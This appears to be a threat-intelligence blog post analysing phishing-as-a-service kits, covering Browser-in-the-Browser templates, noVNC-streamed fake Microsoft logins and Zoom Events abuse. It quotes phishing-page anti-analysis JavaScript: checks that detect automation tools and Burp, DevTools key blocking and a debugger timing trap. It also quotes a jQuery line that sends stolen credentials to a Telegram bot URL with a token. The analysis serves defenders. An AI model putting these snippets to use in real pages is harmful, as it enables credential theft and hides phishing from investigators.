Author: Aarsh Jawa
As cybersecurity platforms have become increasingly sophisticated and more available to users, so have pay-to-play cyberscrime opportunities like Phishing As a Service (PHAAS).
According to SecurityBrief, nearly 70% of all phishing attacks that have occurred in 2025 have been delivered through PHAAS models.
For security analysts, detecting and dismantling the payload in PHAAS campaigns is no longer a simple task. Threat actors are increasingly relying on client-side evasion techniques to stay ahead of both automated detection systems and human investigators. A notable method growing in popularity is the use of JavaScript-based anti-analysis scripts; small but effective bits of code embedded in phishing pages, fake tech support sites, and malicious redirects.
Recently, Doppel’s Threat Intelligence team observed these scripts being used to detect environments associated with analysis, such as headless browsers, proxy tools like Burp Suite, and actions like opening DevTools or viewing page source. Once any such activity is identified, the site immediately redirects the user to a blank page or disables further interaction blocking access before any deeper inspection can occur.
This article examines how these scripts operate, their role in phishing infrastructure, and why defenders must understand these evasion layers that activate before malware ever touches the endpoint.
In recent phishing campaigns, threat actors are layering multiple evasion techniques to increase stealth and reduce the chances of detection. These aren’t just minor obfuscation tricks, they’re deliberate, effective methods designed to frustrate both human analysts and automated security tooling.
For our intelligence team, the real breakthrough came when we traced the origins of this evasion script.
Upon dissecting the structure and obfuscation patterns, we discovered that the phishing kit was being distributed via a public GitHub repository. The repository contained modular components that threat actors could easily customize including fake login pages, wallet prompts, and obfuscated JavaScript evasion logic. The same logic we’ve been observing in the wild was readily accessible, well-documented, and updated frequently suggesting that this kit is not only used in active campaigns but likely maintained for broader use across phishing-as-a-service operations.
This GitHub-hosted kit explains the consistency we’ve seen across unrelated phishing domains using identical evasion tactics. It also highlights how even advanced techniques are increasingly packaged and commoditized lowering the bar for attackers to implement sophisticated detection countermeasures.
The GitHub repo hosting the phishing kit also included a Browser-in-the-Browser (BitB) template, allowing threat actors to mimic a real browser window within the page. This trick makes the fake login prompt look more authentic and helps bypass user suspicion and some automated detection tools.
Key Indicators:
Risk: High – this kit is operational, customizable, and convincing, particularly effective against less technically aware users.
Workflow
Victim lands on a phishing page, e.g., login.html.
These are written to /opt/O365-BITB/creds.txt.
Instead of serving phishing pages directly, some actors now host phishing UIs inside virtual desktop environments using noVNC. The content (fake login forms, wallet drains) is rendered within a VNC session streamed to the victim’s browser. This approach:
In this campaign, the phishing infrastructure doesn’t directly serve static HTML phishing pages. Instead, it deploys a virtual desktop environment using noVNC, exposing a fake login panel (e.g., Microsoft or wallet login) inside the VNC stream.
This is the actual HTML source captured from a live noVNC-based phishing campaign.
Detection Evasion Benefits:
Once the noVNC session is fully established, this is the phishing interface delivered to the victim a pixel-perfect replica of Microsoft’s official login screen. From the branding and font to the “Sign-in options” link, everything is crafted to reduce suspicion and harvest credentials with maximum believability.
The script in these websites is a JavaScript-based anti-analysis and anti-debugging defense commonly used in phishing kits, malicious landing pages, or scam sites to evade manual inspection and automated tools.
Here’s a detailed breakdown of what’s happening:
1. Bot/Tool Detection & Redirection
if (
navigator.webdriver ||
window.callPhantom ||
window._phantom ||
navigator.userAgent.includes("Burp")
) {
window.location.href = "about:blank";
return;
}
Purpose:
Motivation:
Evade:
2. Key Combination Blocking
const BhYjvUYWwE = [ ... ]; // Key code shortcuts like Ctrl+Shift+I, etc.
document.addEventListener("keydown", (evt) => {
if (TQnTJznKKP(evt)) {
evt.preventDefault();
return false;
}
});
Blocks developer/debugger-related shortcuts:
Motivation:
Prevent analysts from opening developer tools to inspect DOM, JS, or network activity.
3. Context Menu Blocking
document.addEventListener("contextmenu", (evt) => {
evt.preventDefault();
return false;
});
Prevents:
Motivation:
Hinders non-technical users from easily exploring the page.
4. Debugger Trap with performance.now()
setInterval(() => {
const start = performance.now();
debugger;
const end = performance.now();
if (end - start > 100 && !IttHmVWiNm) {
pmzZuLqjue = true;
IttHmVWiNm = true;
window.location.replace("https://www.etsy.com");
}
}, 100);
Behavior:
Motivation:
To catch anyone using DevTools or breakpoints to investigate the page. It’s meant to frustrate those attempting to reverse engineer the attack.
This kind of aggressive evasion is typical in phishing, scams, or malware loader sites, especially those mimicking login portals, wallet apps, or payment processors.
These blocking techniques like disabling DevTools, detecting Burp Suite, and setting debugger traps have been observed on phishing sites that recently surfaced in campaigns exploiting legitimate Zoom Events infrastructure.
These attacks typically begin with emails from noreply-zoomevents@zoom.us, urging recipients to “View file” or “Download Desktop App Now.” The initial link points to hxxps://docs.zoom.us/doc/, which then redirects users either to a browser-based AitM (Adversary-in-the-Middle) phishing site employing the evasion tricks mentioned above, or to a malicious download.
This campaign isn’t isolated, similar infrastructure and domain naming conventions were observed in phishing waves last year as well. The attackers consistently use keywords like office, microsoft, or login in subdomains or root domains to lend legitimacy and mimic Microsoft-branded services.
Examples from prior phishing campaigns include:
This tactic increases trust among victims and improves social engineering effectiveness, especially when paired with official branding, fonts, and favicons from Microsoft’s CDN.
In another campaign, we found a phishing kit exfiltrating stolen Microsoft credentials directly to a Telegram bot. Instead of relying on backend servers, it used Telegram’s public API making takedown harder and detection trickier. The fake login page looked convincing, used a clean UI with logos from Firebase, and sent credentials + IP via AJAX the moment a user hit “Sign In.” It’s a simple yet effective method that’s growing more common in modern phishing kits.
Credential Exfiltration via Telegram API
$.ajax({
url: `https://api.telegram.org/bot7505850519:AAG-gm1DwAcpgfKeAXL3M3rl1DXK8D9B1a0/sendMessage?chat_id=6392148304&text=...`
});
Fake Error Handling + Success Page
if (count >= 2) {
$("#div2").hide();
$("#div3").show();
setTimeout(() => {
window.location.replace("https://outlook.live.com/mail/0/inbox");
}, 500);
}
Indicators of Compromise: